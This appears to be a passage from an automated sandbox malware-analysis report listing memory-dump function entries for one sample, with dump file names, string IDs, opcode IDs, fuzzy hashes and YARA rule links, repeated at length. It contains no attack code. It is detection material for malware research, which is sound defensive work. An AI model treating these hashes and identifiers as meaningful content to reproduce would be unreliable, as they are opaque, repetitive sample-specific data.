                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: %
                                                                                                                                                                                                                                          • API String ID: 0-2567322570
                                                                                                                                                                                                                                          • Opcode ID: 52c69291ccd8597d59debb57e0f33be7ed34e7d3c861482424050b6291fefc35
                                                                                                                                                                                                                                          • Instruction ID: 95c80e3f7ddd5a763b877d3c1a51a3e498fde150ec7b63bcd043f9a7a7a1dc47
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52c69291ccd8597d59debb57e0f33be7ed34e7d3c861482424050b6291fefc35
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9C157B3F2152507F3944869CC983A2658397D0324F2F82788F59ABBC9DC7E9D4A6384
                                                                                                                                                                                                                                          Function 001EA39D Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: l
                                                                                                                                                                                                                                          • API String ID: 0-2517025534
                                                                                                                                                                                                                                          • Opcode ID: c77e1649f7e6057693eda128808a762479ed6454cc488bb48cfb523de91a3ffc
                                                                                                                                                                                                                                          • Instruction ID: 67fc640bce169d5c8621f69c0437e5493b6e66e39496e5b46e80e3d5d48e267e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c77e1649f7e6057693eda128808a762479ed6454cc488bb48cfb523de91a3ffc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41B186F3F215254BF3880938CD583A16682ABA5320F2F82788F5D6B7C5DD7E5E0A5384
                                                                                                                                                                                                                                          Function 001A0541 Relevance: 1.5, Strings: 1, Instructions: 295COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: YQg~
                                                                                                                                                                                                                                          • API String ID: 0-1732147944
                                                                                                                                                                                                                                          • Opcode ID: f8e3d8681c1b9abee12241aa26c0278211b6d10c21a2d63792c0d967fe585243
                                                                                                                                                                                                                                          • Instruction ID: edbfadb8e37f11034899182b58c8a39e43dec9d42fc961341a25da282cc846ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8e3d8681c1b9abee12241aa26c0278211b6d10c21a2d63792c0d967fe585243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8A198F3F1022507F7980879CDA83A665839B95320F2F82798F5DAB7C6DC7E5D0A5284
                                                                                                                                                                                                                                          Function 0012230D Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Q
                                                                                                                                                                                                                                          • API String ID: 0-3463352047
                                                                                                                                                                                                                                          • Opcode ID: 14cabe5c56b7dadd4e77ad076b1b54aef80de0d5d21c21eccf1ce52cda555f93
                                                                                                                                                                                                                                          • Instruction ID: 0ef31ddcee76011c9af964c5a9932e5f50a11b7801ee0deb0abaa1a74cbe9466
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14cabe5c56b7dadd4e77ad076b1b54aef80de0d5d21c21eccf1ce52cda555f93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0A1ADB3F2162507F3944D29DC583A26283EBA4311F2F813C8E49AB3C6ED7E9D095384
                                                                                                                                                                                                                                          Function 001CA33C Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: C
                                                                                                                                                                                                                                          • API String ID: 0-1037565863
                                                                                                                                                                                                                                          • Opcode ID: f3cf4ee5a07d915fc07dec8a70a2df7728e649283a82a66a2b38ada41609e728
                                                                                                                                                                                                                                          • Instruction ID: 1f7b9461ddf04449a788b797f9c64c7290e50c9cee5dd7e9622e0d330bb00c6a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3cf4ee5a07d915fc07dec8a70a2df7728e649283a82a66a2b38ada41609e728
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FA18AB7F515254BF3544928CC983627293EBE6315F2FC2788A486BBC9DD3D9D0A5380
                                                                                                                                                                                                                                          Function 00176661 Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: y
                                                                                                                                                                                                                                          • API String ID: 0-4225443349
                                                                                                                                                                                                                                          • Opcode ID: 923c0a66938f34ae9fe95710f1fe6021bc952d4952649cbccf9746699714328f
                                                                                                                                                                                                                                          • Instruction ID: d7253c9ad09da33071955fd004bc40b0c98f0795cfd8a581186c3a585a218864
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 923c0a66938f34ae9fe95710f1fe6021bc952d4952649cbccf9746699714328f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07A189B3F1152947F3944879CD583A266839BD1324F2F82788E5CABBC9D87E9D0A53C4
                                                                                                                                                                                                                                          Function 0025263A Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                                          • API String ID: 0-2657877971
                                                                                                                                                                                                                                          • Opcode ID: e7f5eab2359af286804fec44c4af3e63e30ed57759ea6819bc2a302660aea428
                                                                                                                                                                                                                                          • Instruction ID: 876803689833a055327560f27b5d8938bd965e136a786b8fd61ac756eba932f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7f5eab2359af286804fec44c4af3e63e30ed57759ea6819bc2a302660aea428
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A177B3F1062547F3984865CCA83A265839BD5324F2F827C8E5DAB7C6D87E9D0A53C4
                                                                                                                                                                                                                                          Function 000D7440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                          • String ID: _^]\
                                                                                                                                                                                                                                          • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                          • Opcode ID: 47c492ffcca9b6b9446fbe8fe2897eea3ffc0870c37ef047a20edf7b98e5a9a5
                                                                                                                                                                                                                                          • Instruction ID: 646c4308b515f845a50a67a3332522c0e0a7a0255c4e959d3958eebadd19b131
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47c492ffcca9b6b9446fbe8fe2897eea3ffc0870c37ef047a20edf7b98e5a9a5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 717149B1A0C7005BE7649A28DC92B7B76E1DF82314F18853EE48E87396F274DC05D366
                                                                                                                                                                                                                                          Function 001FA4FF Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6
                                                                                                                                                                                                                                          • API String ID: 0-498629140
                                                                                                                                                                                                                                          • Opcode ID: 50612ae049e2fea5d468b7b192596b038b350e420fcfb50da9b89831700bd9c3
                                                                                                                                                                                                                                          • Instruction ID: 3a87bd02da656ee4f47f5129cedd97b2ae2ed0e35aa209b506d7853b43385790
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50612ae049e2fea5d468b7b192596b038b350e420fcfb50da9b89831700bd9c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1919BB3F1112907F7984C39CC683A66693AB95320F2F827C8E59AB7C5D93E5D0A5384
                                                                                                                                                                                                                                          Function 0016258E Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 2
                                                                                                                                                                                                                                          • API String ID: 0-450215437
                                                                                                                                                                                                                                          • Opcode ID: 7b771d0805c288df40a856821da1baaeb83cac14c5caa166dc77e6283a2fcf74
                                                                                                                                                                                                                                          • Instruction ID: 5c3fd1c97138855f22cce37e0cff2031716c9d863697e48597fc5d760473699b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b771d0805c288df40a856821da1baaeb83cac14c5caa166dc77e6283a2fcf74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1917AB3E1122547F3980D28CC983A17693EB95321F3F82788E696B7C5DD7E5D0A9384
                                                                                                                                                                                                                                          Function 000DC53C Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1377246456.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377216226.00000000000B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377246456.00000000000F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377308662.0000000000103000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000105000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.000000000037D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377338329.00000000003BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377780020.00000000003BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1377957039.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1378006431.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b0000_35K4Py4lii.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: x|*H
                                                                                                                                                                                                                                          • API String ID: 0-3309880273
